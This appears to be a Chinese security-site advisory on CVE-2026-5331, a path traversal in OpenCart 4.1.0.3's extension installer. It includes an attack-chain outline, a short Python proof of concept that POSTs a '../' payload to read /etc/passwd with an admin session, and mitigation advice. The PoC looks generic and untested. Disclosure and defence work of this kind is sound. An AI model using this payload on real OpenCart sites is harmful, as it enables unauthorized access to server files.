CVE-2026-5331 CVSS 4.7 中危

CVE-2026-5331 OpenCart路径遍历漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5331

漏洞类型

路径遍历

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

OpenCart

漏洞概述

OpenCart 4.1.0.3版本存在路径遍历漏洞。该漏洞位于Extension Installer Page组件的installer.php文件中。由于程序未正确过滤用户输入，拥有高权限的攻击者可远程发起攻击，利用路径遍历手段访问服务器上的非预期文件。目前厂商尚未对此漏洞做出响应。

技术细节

该漏洞的根源在于OpenCart的扩展安装功能（installer.php）未能对用户提交的文件路径参数进行充分的校验。攻击者可以通过构造包含“../”等跳转字符的恶意输入，绕过目录限制，访问服务器文件系统中的任意位置。由于CVSS向量显示攻击复杂度低且需要高权限（PR:H），攻击者必须先获得管理员账户权限。成功利用该漏洞后，攻击者可能导致敏感信息泄露（机密性低），文件被篡改（完整性低）或服务中断（可用性低）。鉴于公开披露且厂商未回应，该风险在受控环境下依然存在。

攻击链分析

STEP 1

步骤1：获取权限

攻击者通过钓鱼、弱口令爆破或其他手段获取OpenCart后台管理员账户的权限。

STEP 2

步骤2：构造载荷

攻击者构造包含路径遍历字符（如../）的恶意数据包，目标是installer.php接口。

STEP 3

步骤3：发送请求

在拥有管理员会话的情况下，向服务器发送特制的POST请求。

STEP 4

步骤4：执行攻击

服务器处理请求时未过滤路径，导致攻击者读取或写入任意文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, session_cookie):
    """
    Proof of Concept for OpenCart Path Traversal
    Requires high privileges (Admin session).
    """
    login_url = f"{target_url}/admin/index.php?route=common/login"
    install_url = f"{target_url}/admin/index.php?route=marketplace/installer/install"
    
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Cookie": f"OCSESSID={session_cookie}"
    }
    
    # Malicious payload to traverse directories (e.g., reading /etc/passwd)
    data = {
        "file": "../../../../../../../../etc/passwd"
    }
    
    try:
        response = requests.post(install_url, headers=headers, data=data)
        if "root:" in response.text:
            print("[+] Exploit successful! File content retrieved.")
            print(response.text[:200])
        else:
            print("[-] Exploit failed or target not vulnerable.")
    except Exception as e:
        print(f"Error: {e}")

# Usage
# exploit("http://localhost/opencart", "valid_admin_session_id")

影响范围

OpenCart 4.1.0.3

防御指南

临时缓解措施

由于厂商尚未提供修复方案，建议暂时禁用后台的扩展安装功能，或通过服务器配置（如.htaccess规则）严格限制对installer.php文件的访问，仅允许可信的IP地址访问。同时，加强系统日志监控，及时发现异常的文件访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5331
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5331
3 Details https://www.cvedetails.com/cve/CVE-2026-5331/
4 VulDB https://vuldb.com/cve/CVE-2026-5331
5 Link https://drive.google.com/file/d/1YemSW2Tn0LKzY3mPosMzElQeHs8P3LMt/view?usp=sharing
6 Link https://vuldb.com/submit/780814
7 Link https://vuldb.com/vuln/354665
8 Link https://vuldb.com/vuln/354665/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表